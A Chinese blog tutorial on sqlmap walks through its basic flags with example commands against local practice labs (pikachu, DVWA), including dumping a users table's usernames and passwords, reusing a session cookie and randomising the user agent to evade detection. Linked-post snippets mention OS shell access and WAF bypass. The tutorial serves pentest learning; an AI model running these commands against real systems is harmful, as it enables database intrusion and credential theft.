SQLmap的使用

原创 于 2026-03-02 14:07:00 发布 · 126 阅读 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
cknow-ai Suchadar

cknow-ai 关注

标签
#数据库
分类 信息安全与密码学

        Sqlmap是一个利用python语言开发的一个渗透工具,可以用来进行自动化检测和利用SQL注入漏洞,获取数据库服务器的权限,它具有功能强大的检测引擎,有针对各种不同类型的数据库的渗透测试的功能选项,包括数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。

SQLMap的优势

  1. 全自动化:无需手工构造payload
  2. 支持广泛:支持主流数据库和注入类型
  3. 功能强大:从检测到完全控制数据库
  4. 持续更新:活跃的开源项目

基础命令

1.-u 检测单个 URL 是否存在注入
 -u <目标URL>   检测目标URL是否存在注入

eg.python sqlmap.py -u "http://192.168.100.202:8082/vul/sqli/sqli_str.php?name=kobe&submit=%E6%9F%A5%E8%AF%A2"

2.--batch 全自动模式
--batch  自动回答所有提问,直到任务完成
eg. python sqlmap.py -u "http://192.168.100.202:8082/vul/sqli/sqli_str.php?name=kobe&submit=%E6%9F%A5%E8%AF%A2" --batch

3.--dbs 获取数据库名
--dbs 获取数据库名字
eg. python sqlmap.py -u "http://192.168.100.202:8082/vul/sqli/sqli_str.php?name=kobe&submit=%E6%9F%A5%E8%AF%A2" --dbs

4.-D --tables 获取指定数据库
-D:指定数据库
与--tables配合使用
eg.python sqlmap.py -u "http://192.168.100.202:8082/vul/sqli/sqli_str.php?name=kobe&submit=%E6%9F%A5%E8%AF%A2" -D pikachu --tables

5.-T --columns 获取指定的表名
-T:指定表
与--columns配合使用
eg.python sqlmap.py -u "http://192.168.100.202:8082/vul/sqli/sqli_str.php?name=kobe&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --columns

6.-C --dump获取指定的字段
-C:指定字段
与--dump配合使用
eg.python sqlmap.py -u "http://192.168.100.202:8082/vul/sqli/sqli_str.php?name=kobe&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users -C id,password,username --dump

7.--cookie 携带 Cookie(适用于需要登录的场景)
--cookie
eg.python sqlmap.py -u "http://192.168.100.202:8081/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=uik9mm187m3c7bhsbim791lbg5; security=low" --batch

8.--random-agent 使用user-agent 绕开检测
--random-agent 随机使用user-agent
eg.http://192.168.100.202:8080/vulnerabilities/sqli/?id=1&Submit=Submit# --random-agent

点赞 点赞 1
评论 0
书签 书签 4
sqlmap -u -r参数的使用
qq_52072846的博客
03-15 1万+
SQLMAP基本使用实例 -u参数的用法: 1.爆当前数据库的库名 sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" 爆指定数据库中的表名 sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security --tables
SQLmap常用命令/使用教程
wangyuxiang946的博客
08-08 1万+
SQLmap是一款自动化SQL注入神器,用于SQL注入漏洞的检测和利用,支持多种数据库 检测位置 -u -- 指定url(GET请求) -p -- 指定参数(url包含多个参数时,指定参数) --data= -- 指定POST请求参数 --cookie -- 指定cookie参数 -r -- 从文件中加载HTTP请求(在需要检测的Header后面加上*) 获取数据 --dbs -- 获取数据库--tables -- 获取表名 --columns -- 获取字段名 --du
SQLmap
m0_65332604的博客
04-06 2283
SQLmap
sqlmap基本使用方式(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
03-13 3663
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。会清空之前的session,重新测试该目标。
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
xnxqwzy的博客
09-06 2689
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用数据库4、查看「数据表」5、查看「字段」6、查看「数据」
sqlmap使用教程
hmysn的博客
07-27 1万+
sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。
Sqlmap使用教程
最新发布
wrjhs的博客
04-15 2688
SQLMap是一款自动化SQL注入工具,支持检测和利用多种数据库(如MySQL、Oracle、SQL Server等)的注入漏洞,能够获取数据库信息、文件系统访问权限甚至执行操作系统命令。自动化检测注入点:自动识别GET/POST参数、Cookie等位置的注入漏洞。数据提取:获取数据库名、表、字段及数据。绕过WAF:通过篡改脚本绕过Web应用防火墙的检测。操作系统交互:获取Shell权限或执行远程命令。
SQLMAP使用
qq_63484934的博客
12-29 1897
id=1” --batch -D security --dump (直接对库进行Dump)user-agent 有一个文件 E:\python\sqlmap\data\txt\user-agents.txt’这里注意对库直接进行–dump,要看他是不是时间注入,有选择的–dump。8.看他的payload怎么写的,详细的显示payload。直接替换,查表名,库名,字段名。
sqlmap使用方法
qq_41679358的博客
07-27 1818
SQLmap使用 参数 目标:至少要选中一个参数 -u URL, --url=URL 目标为 URL (例如. “http://www.site.com/vuln.php?id=1”) -g GOOGLEDORK 将谷歌dork的结果作为目标url 请求: 这些选项可用于指定如何连接到目标URL –data=DATA 数据字符串通过POST发送 –cookie=COOKIE HTTP Cookie的值 –random-agent 随机选择 HTTP Us
sqlmap常用基础命令
m0_73826804的博客
02-21 713
-os-cmd,--os-shell 运行任意操作系统命令(仅支持MySQL、PostgreSQL、SQL Server)--file-write "本地文件路径" --file-dest "远程绝对路径" 上传文件到数据库服务器中。--sql-shell 运行自定义SQL语句 用法:sqlmap -u url --sql-shell。sqlmap -u url -D 数据库-T 表名 --columns #列出字段。sqlmap -u url -D 数据库-T 表名 --dump。
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 4374
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 2万+
适合新手的sqlmap使用教程,附带sqlmap命令
SQLMap 使用参数详解
qq_37019068的博客
10-09 2万+
SQLMap 使用参数详解 SQLMap是一款自动化的SQL注入测试工具,在kali上已集成 如果不想使用kali的话,可以从github上直接拉取开源项目 git clone https://github.com/sqlmapproject/sqlmap.git 注:最新版的sqlmap应该是支持python3的,但是如果python3无法使用的话可以试试切换成python2执行 常见参数 -h 输出参数说明 -hh 输出详细的参数
SQLmap使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
06-20 7万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
sqlmap的安装与使用
北冥有鱼
04-05 8774
SQLmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Acess,IBM DB2,SQLLite,Firebird,Sybase和SAP MaxDB……SQLmap采用几种独特的SQL注入技术,分别是盲推理SQL注入,UN...
使用SQLmap进行注入流程
weixin_62715196的博客
08-10 4993
主要讲述SQLmap的主要功能以及对单个目标如何进行注入
kali2020重装SQLmap
qq_46927150的博客
06-12 3442
更新SQLmap时把SQLmap的文件夹删了,而且使用命令git clone https://github.com/sqlmapproject/sqlmap一直卡,下不下来。 重装步骤如下: (1)使用命令git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev (2)查看原来sqlmap的软链接指向的目录(/usr/bin/sqlmap): find / -name sqlmap (3)查看/usr/bi.
sqlmap使用
2403_87533599的博客
01-16 618
这里爆出了表名 news和flag 我们继续查看表flag里的字段。第三道题是mysql结构 但我们依旧使用sqlmap。这里可以看出 sqlmap爆出了数据库名sqli。依旧是sqli的数据库然后爆出表名。接下来查看flag表里的全部数据。然后我们在查看数据库里的表名。查看flag里的全部字段。我们查看表里的全部字段。然后再查看表里的数据。
SQLMAP注入教程-11种常见SQLMAP使用方法详解
dfdhxb995397的博客
08-24 5368
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法:一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值